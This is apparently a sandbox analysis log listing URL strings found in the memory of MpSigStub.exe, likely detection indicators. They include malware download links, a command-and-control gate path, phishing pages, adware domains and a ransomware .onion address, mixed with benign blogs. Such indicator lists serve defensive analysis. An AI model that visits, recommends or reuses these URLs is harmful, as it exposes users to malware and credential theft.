Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?x_dp_id=
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	String found in binary or memory: http://ads4.think-adz.com/
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	String found in binary or memory: http://ads4.think-adz.com/xD
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://adsgo.zh-cn.cc/?
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://adsl.carpediem.fr/perl/invoc_oneway.pl?
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://adult-analsexadult.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://adult-fetishismsexadult.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://adult-xxx-sex-porn-playboy.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://adv-inc-net.com/trackingcode/tracker.html
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://advadmin.biz/tasks
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://advancedcleaner.com
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://advancedtopmax.info/e/59034b87bbb71/59034b87bbbcc.bin
Source: MpSigStub.exe, 00000024.00000003.6273043144.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://advgoogle.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://adyingtiger.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://aerytyre.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: http://aescripts.com
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: http://afkar.today/test_coming.training/w_f/
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp	String found in binary or memory: http://ag.ru
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://agent.wizztrakys.com/csdi/wizzmonetize/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://agentwarderprotector.info/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://ago2.co.kr/bbs/data/dir/note.png
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://agressor58.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://ahkscript.org
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://ahkscript.orgxw
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://ahmad-roni.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://aindonashi.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://ainsleywirefly.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://aircel3ghack.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://airsquirrels.com/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://aitimatafb.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6327431635.00000197A37A2000.00000004.00000001.sdmp	String found in binary or memory: http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://ajustek.com.br/pt-br/clicks.php?
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://akdoganevdeneve.net/wp-content/Panel/gate.php
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://aklick.info/d.php?date=
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://akrilikkapak.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://aksoni.myjino.ru/pn-g/xls.html)
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://akusajaboys.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://al-tasmem.ga/doc/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://alaihomestay.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://albaniaspace.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6327431635.00000197A37A2000.00000004.00000001.sdmp	String found in binary or memory: http://alert-ca.com/counter1/fout.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://alexandrea-friesen16ka.ru.com/rocket.html
Source: MpSigStub.exe, 00000024.00000003.6329226003.00000197A33A2000.00000004.00000001.sdmp	String found in binary or memory: http://alfredo.myphotos.cc/scripts/view.asp
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://alhalm-now.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://alindaenua.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: http://aliyun.one
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://all-best-facts.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://allabouttopten.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://allankhall.com/templates/beez3/language/en-gb/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://allcomics4free.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://allsexyinbox.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://allwallpaper3d.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	String found in binary or memory: http://almasto.net/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://alrozaviation.com/oj
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://altaredlife.com/images/gp8/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://altavista.com/favicon.ico
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://amazing-cars.org
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://ameganfoxhairstyle.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://aminxfreedownload.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://ammun-ra.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://amr16pzcp03omerd.xyz/summer.gif
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://anarushitakute-tamaranai.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://anarushitakute-tamaranai.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://anazhthseis.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp	String found in binary or memory: http://ancalog.tech/
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp	String found in binary or memory: http://ancalog.win/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://andanar.myjino.ru/black/pdfaluko/pdf/pdf/login.htm)
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://andrew08.testar.testforhost.com/ksinamisev.exe/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://andromulator.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://andsihowdint.ru/april/get.php?id=
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://anhchebongda.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://anherbal.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://animator.fetishismadultmovegal.com/pc/page/set_reg.php?af_num=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://animefrase.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://ankarahurdacim.com/wp-admin/3yk1/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://anmolboutique.com/osu/mgs/es/)
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://anomaniez.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: http://anonfile.xyz
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	String found in binary or memory: http://antispysolutions.com/?aid=
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	String found in binary or memory: http://antivirus-x.com/in.cgi?20
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp	String found in binary or memory: http://anty.freehostia.com/xxx/d
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp	String found in binary or memory: http://anty.freehostia.com/xxx/d5SOFTWARE
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://anxw.lolitasexfootube.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://aolopdephn.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg==
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://ap.gamezi.com/
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	String found in binary or memory: http://api.aldtop.com
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://api.downloadmr.com/installer/
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://api.downloadmr.com/installer/xM
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://api.getwebcake.com/getwebcake/gc1
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify.org
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify.org/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://api.mswordexploit.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://apivones.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://apk.downloadatoz.com/package/com.allinone.free.apk
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://apkfull2016.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://apofraxisavlonitis.gr/usswz/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://apollo.thetheme99.com/wp-content/plugins/rrrrutd/mter/azure2020/azure2020/realm/117-crl.html
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp	String found in binary or memory: http://app.fileman.co.kr/app/Fileman.exe
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp	String found in binary or memory: http://app.fileman.co.kr/app/ver.ini
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://app.whenu.com/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: http://apps.bittorrent.com/cl_search/x6
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://apps.tangotoolbar.com
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://appstub.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://appswonder.info
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://appustories.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://apupdates-westeurope.cloudapp.net/Update/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://apy4.lolitasexfootube.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://araazman.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://arab-garden.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://aradiklarinburada.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://archifaktura.hu/nfxdutl.html
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://archiv.kl.com.ua/mssc.exe
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://arianarosefull.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://arifkacip.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://aristocrat.furniture/wp-content/themes/oceanwp/woocommerce/car
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: http://arizonaic.com
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp	String found in binary or memory: http://arpp0934.iespana.es
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://arthisoft.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://articlunik.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://artishollywoodbikini.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://asedownloadgate.com/safe_download/582369/AdsShow.exeg
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://ashevillefusion.com/obngakydblpj
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://asiafoodlog.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://asianhotxxx.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://asilsizhaber.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://aspx.qqus.net/wanmei/login.asp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://aspx.vod38.com/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://assistant.3721.com/help/uninstcns.htm
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://assistant.3721.com/instok
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://asuguglejancok.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://athasoftonlinestore.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	String found in binary or memory: http://ati.vn
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://attcarsint.cf/better/)
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://auglaizeseniorservices.com/lombrdia/lomardia.php
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://australia-505.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://autism-doctor.com.ua/openbizz.html)
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://auto-klad.ru/
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://auto.ie.searchforge.com/
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://auto.ie.searchforge.com/g
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp	String found in binary or memory: http://auto.livesearchpro.com/response
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://auto.search.
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://autocostamecanica.com.br
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://autoescrowpay.com/s.php2
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://autoescrowpay.com/s.php2(MJV:%d
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://autonamlong.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://autothich.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	String found in binary or memory: http://avcute.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://averyfunnypage.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://avnisevinc.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://avocat.com.br/imt/su/index.html
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://avocat360.fr/7-past-due-invoices/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://ayanojou.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://azalea26.orange.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://azalea26.orange.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://b-compu.de/templates/conext/html/com_contact/contact/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://b.reich.io/
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://b.wehelptoyou.com
Source: MpSigStub.exe, 00000024.00000003.6272159714.00000197A331E000.00000004.00000001.sdmp	String found in binary or memory: http://ba3a.biz
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp	String found in binary or memory: http://babelfish.altavista.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://babukq4e2p4wu4iq.onion
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://bachduongshops.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://bahaiat.net/vm/dropbox/)
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://bai2.tlbxsj.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://balaiomaranhao.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://balochirap.com/wp-content/pdf/payment_advice_pdf.php?email=
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://banatara.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://banatte.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://bangash-free-soft.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://bani-pe-net-cum-sa-faci-bani.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6275493852.0000019790C39000.00000004.00000001.sdmp	String found in binary or memory: http://bannercpm.com/bc
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://bar-refaeli-online.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://bardubar.com/mMS83JIdhq/ieygBSH38hsJa/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://barely-art.com/wp-content/themes/pennews/languages/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://barrefaeli-hot.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://batrasiaku.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://batysnewskz.kz/ups.com
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://bbfitblogger.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://bbtbfr.pw/GetHPHost
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://bbtbfr.pw/ads/gad1.js
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://bcoolapp.com
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://bdsmforyoungs.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://beef.smmovefilehost.com/pc/page/set_reg.php?afc=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://bellasimpson.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://berita-mediasemasa.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://berita-tanahmelayu.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://berkah2013.blogspot.com/
